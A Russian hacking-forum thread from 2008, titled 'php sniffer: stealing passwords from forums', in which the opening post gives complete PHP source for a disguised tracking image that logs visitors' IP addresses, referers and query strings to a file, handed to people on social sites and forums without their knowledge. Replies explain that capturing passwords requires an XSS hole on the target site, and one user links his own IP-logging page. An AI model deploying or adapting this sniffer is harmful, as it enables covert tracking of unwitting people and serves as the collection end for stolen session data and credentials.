php-сниффер: кража паролей с форумов итп
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
php-сниффер: кража паролей с форумов итп - 2008-08-28 09:19:56.090000
|
|
|
IInkvizitor
Сообщений: 11
Оценки: 0
Присоединился: 2008-05-29 17:25:16.333333
|
Вот скачал php-сниффер, даю людям в контакте/на форумах, их ip и откеуда пришли вижу, а хеша пароля нет. Как его увидеть? Может у меня фиговый сниффер? =) Вот сам сниффер: img.php <?php
# Функции ---------------- #
function ch_symbol( $Str )
{
$Str = str_replace( "<","<",$Str );
$Str = str_replace( ">",">",$Str );
$Str = str_replace( "_","—",$Str );
return $Str;
}
# ----------------------- #
# Обьявляем переменные -- #
$File = "log.txt";
$Name_Img = "1.gif";
$RZ = "_";
$Date = date( "d:m:Y" );
$Time = date( "H:i" );
$IP = trim( $_SERVER['REMOTE_ADDR'] );
$REF = trim( $_SERVER['HTTP_REFERER'] );
$QS = trim( $_SERVER['QUERY_STRING'] );
# ----------------------- #
# показываем картинку #
Header( "HTTP/1.0 200 OK" );
header( "Content-Type:image/gif" );
if ( file_exists( $Name_Img ) )
{
$Img = fopen( $Name_Img,"r" );
if ( $Img )
{
fpassthru($Img);
fclose($Img);
}
else exit( ":-)" );
}
else exit( ":-)" );
# ----------------------- #
# заменяем символы ------ #
if ( empty($IP) )
{
$IP = "None";
}
else
{
$IP = ch_symbol( $IP );
}
if ( empty($REF) )
{
$REF = "None";
}
else
{
$REF = ch_symbol( $REF );
}
if ( empty($QS) )
{
$QS = "None";
}
else
{
$QS = ch_symbol( $QS );
}
# ---------------------- #
# открываем файл лога в режиме чтения и заносим
# всё содержимое в буфер(переменную)
if ( file_exists($File) )
{
$Fpr = fopen( $File,"r" );
if ( $Fpr )
{
# блокируем файл и читаем собержимое #
flock( $Fpr,LOCK_SH );
$Bufer = fread( $Fpr,filesize($File) );
flock( $Fpr,LOCK_UN );
fclose( $Fpr );
# ---------------------------------- #
# открываем(создаём) файл и записываем информацию переданную скрипту
# и дописываем в конец предыдущую информацию, таким образом новая информация
# находиться всегда впереди(вверху)
$Fpw = fopen( $File,"w" );
if ( $Fpw )
{
for($i=0; $i<10; ++$i )
{
if ( flock($Fpw,LOCK_EX) ) break;
else sleep(1);
}
fwrite( $Fpw,$IP.$RZ.$REF.$RZ.$QS.$RZ.$Date.$RZ.$Time."\n");
fwrite( $Fpw,$Bufer );
flock( $Fpw,LOCK_UN );
fclose( $Fpw );
}
else exit( ":-)" );
}
else exit( ":-)" );
}
else exit( ":-)" );
# ------------------------------------------ #
?> log.php <html>
<head>
<style type="text/css">
BODY { background:#708090 }
A{ font:11px Verdana; color:#FFF; font-weight:bold; text-decoration:none }
A:HOVER { text-decoration:underline }
#ERROR { font:12px Verdana; font-weight:bold; color:#FFF }
#MAIN_TBL { border:2px solid #666; background:; }
#IP_TXT { font:12px Verdana; font-weight:bold }
#IP_VAL { font:12px Verdana; font-weight:bold; color:#008000 }
#REF_TXT { font:12px Verdana; color:#000080 }
#REF_VAL { font:12px Verdana; color:#A52A2A }
#SQ_TXT { font:12px Verdana; color:#000080 }
#SQ_VAL { font:12px Verdana; color:#A52A2A }
.BGCOLOR { background:#F5DEB3 }
.BGCOLOR2 { background:#D2B48C }
.TIME_DATE { font:11px Verdana; font-weight:bold; color:#8B4513 }
.DEFAULT { margin:2px 5px 2px 5px }
</style>
</head>
<body leftmargin="0" rightmargin="0" topmargin="0" bottommargin="0">
<?php
# Оюьявляем переменные ------------------------------ #
$file = "log.txt";
$email = "<a href='mailto:faunder@tut.by'>Vantuz</a>";
$error = "<br><br><br><center><span id='error'>Файл лога пуст</span><br>".$email."</center>";
$error_no_file = "<br><br><br><center><span id='error'>Файл лога недоступен</span><br>".$email."</center>";
$onpage = 10;
# --------------------------------------------------- #
if ( file_exists( $file ) )
{
# записываем содержимое файла в масиив #
$file_array = file( $file );
$file_count = count( $file_array );
# ------------------------------------ #
# если файл пуст, то выводим сообщение
# об ошибке и останавливаем скрипт #
if ( $file_count == 0 )
exit( $error );
# ------------------------------------ #
# если $_GET['show'](значение страницы которую надо вывести) не существует
# или она пуста или меньше нуля или не число то, присваиваем значение ноль
# т.е. первая страница в логе
if ( !isset($_GET['show']) or empty($_GET['show'])
or $_GET['show'] < 0 or !preg_match("/^[\d]+$/i",$_GET['show']) )
{
$show = 0;
}
else
{
$show = $_GET['show'];
}
# иначе присваиваем $show значение из $_GET['show'] #
# $allpages количество всех страниц -------- #
# $atpage с какого сообщения нужно выводить
# $topageдо какого сообщения нужно выводить
$allpages = ceil( $file_count/$onpage );
$atpage = $show * $onpage;
$topage = $atpage + $onpage;
# ------------------------------------------ #
# если значение $topage больше значения всех сообщений
# то выводим сообщения до $file_count
if ( $topage > $file_count )
{
$topage = $file_count;
}
echo "<br><br>";
# выводим содержимое файла лога в броузер в отформатированном виде #
for( $n=$atpage; $n<$topage; $n++ )
{
list( $Ip,$Ref,$Qs,$Date,$Time ) = explode( "_",$file_array[$n] );
echo "<table width='100%' cellspacing='0' cellpadding='0'>";
echo "<tr>";
echo "<td width='10%'>";
echo "<td width='80%'>";
echo "<table width='100%' cellspacing='1' cellpadding='2' id='main_tbl'>";
echo "<td width='25%' class='bgcolor'>";
echo "<div class='default'>";
echo "<span id='ip_txt'>IP адрес : </span><span id='ip_val'>".$Ip."</span>";
echo "</div>";
echo "</td>";
echo "<td align='right' class='bgcolor'>";
echo "<div class='default'>";
echo "<span class='time_date'>Время : ".$Time."</span>";
echo "</div>";
echo "</td>";
echo "<td align='right' width='17%' class='bgcolor'>";
echo "<div class='default'>";
echo "<span class='time_date'>Дата : ".$Date."</span>";
echo "</div>";
echo "</td>";
echo "</tr>";
echo "<tr>";
echo "<td class='bgcolor2'>";
echo "<div class='default'>";
echo "<span id='ref_txt'>Откуда пришёл : </span>";
echo "</div>";
echo "</td>";
echo "<td colspan='2' class='bgcolor2'>";
echo "<div class='default'>";
echo "<span id='ref_val'>".$Ref."</span>";
echo "</div>";
echo "</td>";
echo "</tr>";
echo "<tr>";
echo "<td class='bgcolor2'>";
echo "<div class='default'>";
echo "<span id='sq_txt'>Строка запроса : </span>";
echo "</div>";
echo "</td>";
echo "<td colspan='2' class='bgcolor2'>";
echo "<div class='default'>";
echo "<span id='sq_val'>".$Qs."</span>";
echo "</div>";
echo "</td>";
echo "</table>";
echo "</td>";
echo "<td width='10%'>";
echo "</tr>";
echo "</table>";
echo "<br>";
}
# -------------------------------------------------------------------- #
# Навигация -----------------------------------------#
echo "<center>";
for ( $i=0; $i<$allpages; $i++ )
{
$totalpage = $i + 1;
if ( $i == $show )
echo "<b>".$totalpage."</b>";
if ( $i != $show )
echo " <a href='?show=".$i."'>".$totalpage."</a> ";
}
echo "</center>";
# Навигация -----------------------------------------#
# иоё мыло ------------- #
echo "<br>";
echo "<center>".$email."</center>";
# иоё мыло ------------- #
}
else
exit( $error_no_file );
?>
</body>
</html> +еще картинка 1.gif+log.txt
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:03:16.933333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
Наверно припозднился с ответом^^ он не должен снифать пароль, он лукает айпи при входе на img.php. В логах записывается время на 7 часов отстающее от московского. не порядок^^ Как исправить?
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:13:21.876666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Эм перед тем как спросить можно и в гуглеосилитьстатейку по xss))
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:19:41.253333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
gпричем тут xss?) там нашел ток одну строку. нет, две строки. отвечающие за время echo "<span class='time_date'>Время : ".$Time."</span>";
list( $Ip,$Ref,$Qs,$Date,$Time ) = explode( "_",$file_array[$n] ); Еще одна отвечает за вид выводимой инфы время_дата. Где там вообще часовой пояс задается?)
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:21:38.380000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Mr_Naeba gпричем тут xss?) там нашел ток одну строку. нет, две строки. отвечающие за время echo "<span class='time_date'>Время : ".$Time."</span>";
list( $Ip,$Ref,$Qs,$Date,$Time ) = explode( "_",$file_array[$n] ); Еще одна отвечает за вид выводимой инфы время_дата. Где там вообще часовой пояс задается?) Интересно как вы пытаетесь соснифать пасс не имея xss баги в нужном сайте?
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:30:49.883333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
кхм. я его поставил на свой хост, если надо узнать чей той айпи - кидаю ссыль. никто не отказывал ^_^ оу, или эт от времени хоста зависит?(
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:35:30.523333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Mr_Naeba кхм. я его поставил на свой хост, если надо узнать чей той айпи - кидаю ссыль. никто не отказывал ^_^ оу, или эт от времени хоста зависит?( Я отвечал на вопрос ТС который хотел снифануть пасс)) НАсчёт времени скорее всего от времени хостинга зависит. зы:ip моно узнать намного проще)
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-04 13:38:48.293333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
http://fully_former.phpnet.us/katal/boobles.php - против такого мужик не пройдет^^ По мне, так и этот не сложный^^ Думаю что ТС уже глубоко безразлично:) Да и он тоже наверн ссыль на хост давал.
Как можно время поменять? Кусок кода скажите, и куда его ставить^^ Я пхп не разбирал.
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-13 11:09:26.063333
|
|
|
Dr.James
Сообщений: 250
Оценки: 0
Присоединился: 2007-10-27 16:08:24.420000
|
Mr_Naeba ты каким хостингом пользуешся?
|
|
|
RE: php-сниффер: кража паролей с форумов итп - 2008-10-13 14:36:46.376666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
По поводу IP узнать - смотрите на мою подпись, а снифануть пасс можно только если вы нашли XSS на атакуемом сайте. Так что нет XSS - нет и толку от снифера
|
|
|
|
|